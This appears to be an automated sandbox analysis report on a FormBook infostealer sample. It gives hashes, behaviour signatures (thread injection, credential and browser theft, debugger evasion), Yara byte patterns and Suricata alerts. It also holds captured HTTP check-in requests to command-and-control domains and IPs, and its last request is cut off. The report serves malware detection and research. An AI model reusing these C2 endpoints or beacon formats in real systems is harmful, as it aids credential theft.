Windows Analysis Report
fJD7ivEnzm.exe

Overview

General Information

Sample name: fJD7ivEnzm.exe (renamed because the original name is a hash value)
Original sample name: f5d173e1e89e02211fa67806e20fcf4fb9c7dcd656929ffad54840454bae58a9.exe
Analysis ID: 1529089
MD5: 46bb75d27887b28474a3eb4570d89ca5
SHA1: ac12d22d8683b2129c848661eb4c130c99fc8923
SHA256: f5d173e1e89e02211fa67806e20fcf4fb9c7dcd656929ffad54840454bae58a9
Tags: exe, Formbook, user-adrian__luca

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected FormBook
AI detected suspicious sample
Found direct / indirect Syscall (likely to bypass EDR)
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (date check)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
PE file contains an invalid checksum
Potential key logger detected (key state polling based)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Uncommon Svchost Parent Process
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • fJD7ivEnzm.exe (PID: 6308 cmdline: "C:\Users\user\Desktop\fJD7ivEnzm.exe" MD5: 46BB75D27887B28474A3EB4570D89CA5)
    • svchost.exe (PID: 6520 cmdline: "C:\Users\user\Desktop\fJD7ivEnzm.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
      • IqZHJpXEsts.exe (PID: 5744 cmdline: "C:\Program Files (x86)\nBZsoeShtiRFZWDJaFbPRYrKpKKMGNRMkspbHPHhwFJbwKNWOIybbDSualJqkBGoZjnHG\IqZHJpXEsts.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • netbtugc.exe (PID: 5172 cmdline: "C:\Windows\SysWOW64\netbtugc.exe" MD5: EE7BBA75B36D54F9E420EB6EE960D146)
          • IqZHJpXEsts.exe (PID: 2844 cmdline: "C:\Program Files (x86)\nBZsoeShtiRFZWDJaFbPRYrKpKKMGNRMkspbHPHhwFJbwKNWOIybbDSualJqkBGoZjnHG\IqZHJpXEsts.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 5460 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup
No configs have been found
Yara matches in memory dumps (Source; Rule; Description; Author; Strings):
  • 00000001.00000002.1996196701.0000000000400000.00000040.80000000.00040000.00000000.sdmp; JoeSecurity_FormBook_1; Yara detected FormBook; Joe Security
  • 00000001.00000002.1996196701.0000000000400000.00000040.80000000.00040000.00000000.sdmp; Windows_Trojan_Formbook_1112e116; unknown; unknown
      • 0x2ed63:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
      • 0x16f92:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
  • 00000006.00000002.3638744438.00000000032E0000.00000040.80000000.00040000.00000000.sdmp; JoeSecurity_FormBook_1; Yara detected FormBook; Joe Security
  • 00000006.00000002.3638744438.00000000032E0000.00000040.80000000.00040000.00000000.sdmp; Windows_Trojan_Formbook_1112e116; unknown; unknown
      • 0x2bd00:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
      • 0x13f2f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
  • 00000006.00000002.3638995982.00000000035D0000.00000004.00000800.00020000.00000000.sdmp; JoeSecurity_FormBook_1; Yara detected FormBook; Joe Security
  (9 entries in total)

Yara matches in unpacked PE files (Source; Rule; Description; Author; Strings):
  • 1.2.svchost.exe.400000.0.unpack; JoeSecurity_FormBook_1; Yara detected FormBook; Joe Security
  • 1.2.svchost.exe.400000.0.unpack; Windows_Trojan_Formbook_1112e116; unknown; unknown
      • 0x2df63:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
      • 0x16192:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
  • 1.2.svchost.exe.400000.0.raw.unpack; JoeSecurity_FormBook_1; Yara detected FormBook; Joe Security
  • 1.2.svchost.exe.400000.0.raw.unpack; Windows_Trojan_Formbook_1112e116; unknown; unknown
      • 0x2ed63:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
      • 0x16f92:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01

            System Summary

Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: "C:\Users\user\Desktop\fJD7ivEnzm.exe", CommandLine: "C:\Users\user\Desktop\fJD7ivEnzm.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\fJD7ivEnzm.exe", ParentImage: C:\Users\user\Desktop\fJD7ivEnzm.exe, ParentProcessId: 6308, ParentProcessName: fJD7ivEnzm.exe, ProcessCommandLine: "C:\Users\user\Desktop\fJD7ivEnzm.exe", ProcessId: 6520, ProcessName: svchost.exe
Source: Process started; Author: vburov; Data: Command: "C:\Users\user\Desktop\fJD7ivEnzm.exe", CommandLine: "C:\Users\user\Desktop\fJD7ivEnzm.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\fJD7ivEnzm.exe", ParentImage: C:\Users\user\Desktop\fJD7ivEnzm.exe, ParentProcessId: 6308, ParentProcessName: fJD7ivEnzm.exe, ProcessCommandLine: "C:\Users\user\Desktop\fJD7ivEnzm.exe", ProcessId: 6520, ProcessName: svchost.exe


            AV Detection

Source: fJD7ivEnzm.exe; Avira: detected
Source: fJD7ivEnzm.exe; ReversingLabs: Detection: 68%
Source: Yara match; File source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 00000001.00000002.1996196701.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000006.00000002.3638744438.00000000032E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000006.00000002.3638995982.00000000035D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000001.00000002.1996763400.0000000003850000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000006.00000002.3638935792.0000000003580000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000001.00000002.1996814627.0000000003C00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000004.00000002.3639798172.00000000031D0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Submitted Sample; Integrated Neural Analysis Model: Matched 100.0% probability
Source: fJD7ivEnzm.exe; Joe Sandbox ML: detected
Source: fJD7ivEnzm.exe; Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: IqZHJpXEsts.exe, 00000004.00000000.1922332064.00000000000FE000.00000002.00000001.01000000.00000004.sdmp, IqZHJpXEsts.exe, 00000007.00000002.3638744641.00000000000FE000.00000002.00000001.01000000.00000004.sdmp
            Source: Binary string: wntdll.pdbUGP source: fJD7ivEnzm.exe, 00000000.00000003.1793057046.0000000004840000.00000004.00001000.00020000.00000000.sdmp, fJD7ivEnzm.exe, 00000000.00000003.1789568752.00000000046A0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1899809963.0000000003100000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1901863289.0000000003300000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1996459004.000000000369E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1996459004.0000000003500000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000006.00000002.3640025456.0000000003C4E000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000006.00000003.1996513714.000000000375A000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000006.00000002.3640025456.0000000003AB0000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000006.00000003.1998537625.0000000003902000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: fJD7ivEnzm.exe, 00000000.00000003.1793057046.0000000004840000.00000004.00001000.00020000.00000000.sdmp, fJD7ivEnzm.exe, 00000000.00000003.1789568752.00000000046A0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000001.00000003.1899809963.0000000003100000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1901863289.0000000003300000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1996459004.000000000369E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1996459004.0000000003500000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, netbtugc.exe, 00000006.00000002.3640025456.0000000003C4E000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000006.00000003.1996513714.000000000375A000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000006.00000002.3640025456.0000000003AB0000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000006.00000003.1998537625.0000000003902000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: netbtugc.pdb source: svchost.exe, 00000001.00000002.1996320548.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1964838255.0000000002E1A000.00000004.00000020.00020000.00000000.sdmp, IqZHJpXEsts.exe, 00000004.00000002.3639292948.00000000014A8000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: svchost.pdb source: netbtugc.exe, 00000006.00000002.3640439126.00000000040DC000.00000004.10000000.00040000.00000000.sdmp, netbtugc.exe, 00000006.00000002.3639094585.000000000365E000.00000004.00000020.00020000.00000000.sdmp, IqZHJpXEsts.exe, 00000007.00000000.2067866976.0000000002D4C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2390344641.000000002249C000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: svchost.pdbUGP source: netbtugc.exe, 00000006.00000002.3640439126.00000000040DC000.00000004.10000000.00040000.00000000.sdmp, netbtugc.exe, 00000006.00000002.3639094585.000000000365E000.00000004.00000020.00020000.00000000.sdmp, IqZHJpXEsts.exe, 00000007.00000000.2067866976.0000000002D4C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2390344641.000000002249C000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: netbtugc.pdbGCTL source: svchost.exe, 00000001.00000002.1996320548.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1964838255.0000000002E1A000.00000004.00000020.00020000.00000000.sdmp, IqZHJpXEsts.exe, 00000004.00000002.3639292948.00000000014A8000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Users\user\Desktop\fJD7ivEnzm.exe; Code function: 0_2_00452492 FindFirstFileW,Sleep,FindNextFileW,FindClose, 0_2_00452492
Source: C:\Users\user\Desktop\fJD7ivEnzm.exe; Code function: 0_2_00442886 FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 0_2_00442886
Source: C:\Users\user\Desktop\fJD7ivEnzm.exe; Code function: 0_2_004788BD FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf, 0_2_004788BD
Source: C:\Users\user\Desktop\fJD7ivEnzm.exe; Code function: 0_2_004339B6 GetFileAttributesW,FindFirstFileW,FindClose, 0_2_004339B6
Source: C:\Users\user\Desktop\fJD7ivEnzm.exe; Code function: 0_2_0045CAFA FindFirstFileW,FindNextFileW,FindClose, 0_2_0045CAFA
Source: C:\Users\user\Desktop\fJD7ivEnzm.exe; Code function: 0_2_00431A86 FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 0_2_00431A86
Source: C:\Users\user\Desktop\fJD7ivEnzm.exe; Code function: 0_2_0044BD27 _wcscat,_wcscat,__wsplitpath,FindFirstFileW,CopyFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindClose,MoveFileW,FindNextFileW,FindClose, 0_2_0044BD27
Source: C:\Users\user\Desktop\fJD7ivEnzm.exe; Code function: 0_2_0045DE8F FindFirstFileW,FindClose, 0_2_0045DE8F
Source: C:\Users\user\Desktop\fJD7ivEnzm.exe; Code function: 0_2_0044BF8B _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,FindClose, 0_2_0044BF8B
Source: C:\Windows\SysWOW64\netbtugc.exe; Code function: 6_2_032FC2C0 FindFirstFileW,FindNextFileW,FindClose, 6_2_032FC2C0
Source: C:\Windows\SysWOW64\netbtugc.exe; Code function: 4x nop then xor eax, eax; 6_2_032E9B90
Source: C:\Windows\SysWOW64\netbtugc.exe; Code function: 4x nop then pop edi; 6_2_03302399
Source: C:\Windows\SysWOW64\netbtugc.exe; Code function: 4x nop then mov ebx, 00000004h; 6_2_039004DE

            Networking

Source: Network traffic; Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49736 -> 148.72.152.174:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49820 -> 3.33.130.190:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49807 -> 3.33.130.190:80
Source: Network traffic; Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49736 -> 148.72.152.174:80
Source: Network traffic; Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49854 -> 3.33.130.190:80
Source: Network traffic; Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49854 -> 3.33.130.190:80
Source: Network traffic; Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49929 -> 172.191.244.62:80
Source: Network traffic; Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49929 -> 172.191.244.62:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49884 -> 172.191.244.62:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49838 -> 3.33.130.190:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49965 -> 172.96.191.39:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49979 -> 172.96.191.39:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49990 -> 172.96.191.39:80
Source: Network traffic; Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:50009 -> 172.96.191.39:80
Source: Network traffic; Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:50009 -> 172.96.191.39:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50017 -> 217.70.184.50:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50022 -> 63.250.47.40:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50021 -> 63.250.47.40:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49898 -> 172.191.244.62:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50019 -> 217.70.184.50:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50026 -> 91.184.0.200:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50029 -> 13.248.169.48:80
Source: Network traffic; Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:50032 -> 13.248.169.48:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50018 -> 217.70.184.50:80
Source: Network traffic; Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:50024 -> 63.250.47.40:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50025 -> 91.184.0.200:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49915 -> 172.191.244.62:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50037 -> 43.242.202.169:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50038 -> 43.242.202.169:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50031 -> 13.248.169.48:80
Source: Network traffic; Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:50032 -> 13.248.169.48:80
Source: Network traffic; Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:50024 -> 63.250.47.40:80
Source: Network traffic; Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:50040 -> 43.242.202.169:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50030 -> 13.248.169.48:80
Source: Network traffic; Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:50040 -> 43.242.202.169:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50039 -> 43.242.202.169:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50027 -> 91.184.0.200:80
Source: Network traffic; Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:50028 -> 91.184.0.200:80
Source: Network traffic; Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:50028 -> 91.184.0.200:80
Source: Network traffic; Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:50020 -> 217.70.184.50:80
Source: Network traffic; Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:50020 -> 217.70.184.50:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50041 -> 103.224.182.242:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50023 -> 63.250.47.40:80
Source: Joe Sandbox View; IP Address: 172.191.244.62
Source: Joe Sandbox View; IP Address: 63.250.47.40
Source: Joe Sandbox View; IP Address: 13.248.169.48
Source: Joe Sandbox View; ASN Name: ATT-INTERNET4US
Source: Joe Sandbox View; ASN Name: NAMECHEAP-NETUS
Source: Joe Sandbox View; ASN Name: AMAZON-02US
Source: Joe Sandbox View; ASN Name: HOSTNETNL
Source: unknown; UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\Users\user\Desktop\fJD7ivEnzm.exe; Code function: 0_2_004422FE InternetQueryDataAvailable,InternetReadFile, 0_2_004422FE
Source: global traffic; HTTP traffic detected:
    GET /2jit/?e6mhx=LZwxPLrhqt_8A&-NnllVvH=iS4P4oRSl8BXKzGHIPEeBFILTgF0I4K6JXAZlPSQukWhX6ryYmutle+397gP2E/7l5jfN0VXuv9esRLW6mV1TqEhan6EIKUcOtzcvEOIT7DGSSciknjeHA8= HTTP/1.1
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
    Accept-Language: en-US,en;q=0.9
    Host: www.elsupertodo.net
    Connection: close
    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Source: global traffic; HTTP traffic detected:
    GET /7xi5/?-NnllVvH=ixI46zwDNWOoK0d6d59SvpgDB+zqSFA+qsFL+v4hzxqFGT4p3+8WtoPKGUs/aT1fkDncxQRflpqJVuNQFbELBx/+PEXrpF63uptF2gwKAcNaoJelZ45iHH4=&e6mhx=LZwxPLrhqt_8A HTTP/1.1
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
    Accept-Language: en-US,en;q=0.9
    Host: www.omexai.info
    Connection: close
    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Source: global traffic; HTTP traffic detected:
    GET /fpzw/?e6mhx=LZwxPLrhqt_8A&-NnllVvH=vk5QQsijTkj0pfF2YbFfXs6zKmlYZL+gcHfTrVh5yCT2NPNs5yeYEP2CyzpPbJkscWMx5aBCkSlgAfiy0IyVw6vzCqwT6MlUYIeNh7VIWund7P0tYTSeyak= HTTP/1.1
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
    Accept-Language: en-US,en;q=0.9
    Host: www.tekilla.wtf
    Connection: close
    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Source: global traffic; HTTP traffic detected:
    GET /3qit/?-NnllVvH=t3sSYQcRGIG2xp6hThC36NAa5pulFT6rmgygjruUB9PzjWbyP4PTndkMOMUzUXzJWS/x79p8zVoA5FmvnGMYRx0f6/FSPt3YGxqpBfNEWUCZ6CvMlkEJ/uE=&e6mhx=LZwxPLrhqt_8A HTTP/1.1
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
    Accept-Language: en-US,en;q=0.9
    Host: www.bola88site.one
    Connection: close
    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Source: global traffic; HTTP traffic detected:
    GET /nxfn/?e6mhx=LZwxPLrhqt_8A&-NnllVvH=6j3CvtUhPdUgNSN69nh1RWvnIL+RhJE9GdmFQzyR6PqyVz5YOV5r49CB0ghAIxZx6PIHaKVcYUnZkN+R6pfVeUaFaQwVg8/fN6RHd5lVuyrWHiNmavf3gAw= HTTP/1.1
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
    Accept-Language: en-US,en;q=0.9
    Host: www.languagemodel.pro
    Connection: close
    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Source: global traffic; HTTP traffic detected:
    GET /3bdq/?-NnllVvH=mPDvA1qI3GiuntP60bqgVobnrbMnRYp61+amzFfuWlPCagi05gb63n03Sa0iFCs5HVPasI6LuL9f8nEGr4Exu2k3ruJCpl2j2bvSmTd+X0q2Ansy3FLMFak=&e6mhx=LZwxPLrhqt_8A HTTP/1.1
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
    Accept-Language: en-US,en;q=0.9
    Host: www.kexweb.top
    Connection: close
    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Source: global traffic; HTTP traffic detected:
    GET /ikh0/?e6mhx=LZwxPLrhqt_8A&-NnllVvH=lvx8xqKuEeZXr5ITqNCHPh3uOhDJ1jEsZETVjxqXK0Zv2i3/Db6zT6O/acvvHmVSaGyiGmLaE43R+XLSCAO1vJ6qU/h+jhYmRiU/b4DSTDHjmvsEtFplu6A= HTTP/1.1
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
    Accept-Language: en-US,en;q=0.9
    Host: www.jobworklanka.online
    Connection: close
    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Source: global traffic; HTTP traffic detected:
    GET /h7lb/?-NnllVvH=RbPHaORuq3VLsIvFE+kS4135sHK2QWKtxUtCmsRXGI6jytYd3WVHAygqsg9m4sx7IXgloFX+8G+vydQZJLP0V+w2gPP1i9gS6DQX/6Khz8EBa74P+FOl6aE=&e6mhx=LZwxPLrhqt_8A HTTP/1.1
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
